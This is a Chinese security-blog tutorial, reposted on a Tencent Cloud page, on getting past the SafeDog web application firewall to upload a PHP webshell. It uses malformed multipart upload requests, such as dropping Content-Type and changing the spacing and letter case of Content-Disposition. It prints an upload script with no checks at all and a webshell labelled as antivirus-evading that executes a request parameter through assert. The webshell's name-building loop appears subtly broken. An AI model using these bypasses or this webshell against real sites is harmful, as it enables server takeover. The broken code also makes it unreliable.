前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话

绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话

作者头像
FB客服
发布2018-02-09 16:34:14
1.7K0
发布2018-02-09 16:34:14
举报
文章被收录于专栏:FreeBufFreeBuf

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

<?php $path = dirname(__FILE__) . '/upload/'; $rand = rand(0,30); move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";echo "OK";?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

(3)修改Content-Disposition字段值的大小写:

6、菜刀连接一句话:

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

<?php/* PHP一句话木马 assert($string) */ $arr = array('a','s','s','e','r','t'); $func = '';for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']);?>

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

*本文原创作者:1_2(QQ:965207103),本文属FreeBuf原创奖励计划,未经许可禁止转载

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-01-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1、实验环境:
  • 2、用于文件上传的PHP源码:
  • 3、先看一下正常的HTTP请求:
  • 4、尝试%00截断:
  • 5、修改HTTP请求,构造畸形HTTP请求
  • 6、菜刀连接一句话:
  • 7、免杀PHP一句话:
  • 8、修复漏洞:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档